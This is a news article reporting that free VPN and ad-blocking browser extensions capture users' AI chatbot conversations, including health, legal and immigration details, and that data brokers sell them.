Browser Extensions Harvesting Sensitive Chatbot Data for Sale

Browser extensions claiming to offer VPN or ad-blocking services are secretly intercepting users' AI chatbot conversations, capturing sensitive personal data including medical records, legal information, and immigration status, which is then sold to data brokers despite claims of anonymization.

Data brokers are selling access to deeply personal information captured from AI chatbot conversations, including sensitive health and legal details, through browser extensions that users unknowingly install for free VPN or ad-blocking services.

How the Data Harvesting Works

According to Lee S Dryburgh, an expert in AI visibility for consumer health and longevity brands, the process begins when users install browser extensions that claim to offer free VPN service, ad blocking, or other capabilities. These extensions often come with privacy policies that users don't read or understand.

The extensions intercept users' communications with AI services like ChatGPT, Gemini, Claude, and DeepSeek by overriding the browser's native fetch() and XMLHttpRequest() functions. This allows them to capture every prompt and every response from the user's conversations.

The Data Collection Pipeline

Once captured, this data is stored in a vector database and exposed via API to authenticated customers. While the panelists have pseudonymized IDs using SHA-256 hashes, the content of their conversations is stored verbatim and searchable. Many prompts contain real names, dates of birth, medical record numbers, and diagnosis codes.

Dryburgh gained access to a major VC-backed generative engine optimization platform, which allowed him to examine aggregated clickstream data made available to customers. Through this platform, he made 205 queries using semantic search and received approximately 490 unique prompts from around 435+ unique panelists across 20 sensitive categories.

Categories of Sensitive Information Exposed

The data harvesting revealed conversations across multiple deeply personal categories:

Mental Health and Well-being: Depression, suicide, self-harm, medication, abuse, and eating disorders

Substance and Medical Issues: Substance abuse, medical diagnoses, financial vulnerability, children, sexuality, and immigration

Serious Health Conditions: HIV/STDs, cancer, fertility/pregnancy, children, sexual violence, financial crisis, and medical diagnoses

Legal and Personal Information: Clinical HIPAA notes, legal PII, relationships, gender identity, criminal records, workplace harassment, and religious identity

Real-World Examples of Exposed Data

Dryburgh's report cites specific examples of the sensitive information being captured. One conversation included a first name and date of birth:

"Am I pregnant? [first name withheld] [birth date withheld] I know these aren't questions you'd like to answer but I'm terrified…"

Another concerning finding was conversations from undocumented immigrants and asylum seekers who had posed questions to chatbots about their legal status. Having this information available in a commercial database creates serious legal risk, particularly in the current political climate.

Healthcare Worker Violations

The most damning finding, according to Dryburgh, is that healthcare workers are pasting real patient data into AI chatbots, and that data is now part of a commercial database. This represents a significant violation of HIPAA and other healthcare privacy regulations.

Corporate Data Exposure

Beyond personal health and legal information, Dryburgh discovered that many conversations involve people pasting internal corporate information into chatbots for rewrites and summaries. This exposes sensitive business data to data brokers and their customers.

Shared Account Violations

A portion of these conversations appears to come from accounts that have been shared in violation of terms of service. Dryburgh explained that remote workers doing work for Western clients may rely on third-party services that sell groups of people access to a single chatbot account because those workers cannot afford to pay for individual subscriptions.

The workers who pay for these cheap AI services are likely to use the sorts of free VPNs that capture clickstream data, creating a cycle of data exposure.

Legal and Ethical Concerns

While the companies that aggregate this web clickstream data insist that their data handling is lawful and the data is anonymized, this claim provides little comfort. It has long been known that anonymized profiles can sometimes be re-identified by connecting a few data points, a process that AI assistance has made much easier.

Dryburgh's findings demonstrate that despite claims of anonymization, many conversations reveal names and other sensitive details that can be used to identify individuals.

The Broader Implications

The result, according to Dryburgh's report, is that customers of these data brokers can search and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations.

This represents a significant privacy violation and creates potential for discrimination, harassment, and other harms to individuals whose most private conversations have been captured and monetized without their knowledge or consent.

The practice raises serious questions about the responsibility of browser extension developers, data brokers, and AI service providers in protecting user privacy and preventing the unauthorized collection and sale of sensitive personal information.

#Data Brokers #Browser Extensions #AI-privacy #HIPAA #Personal Data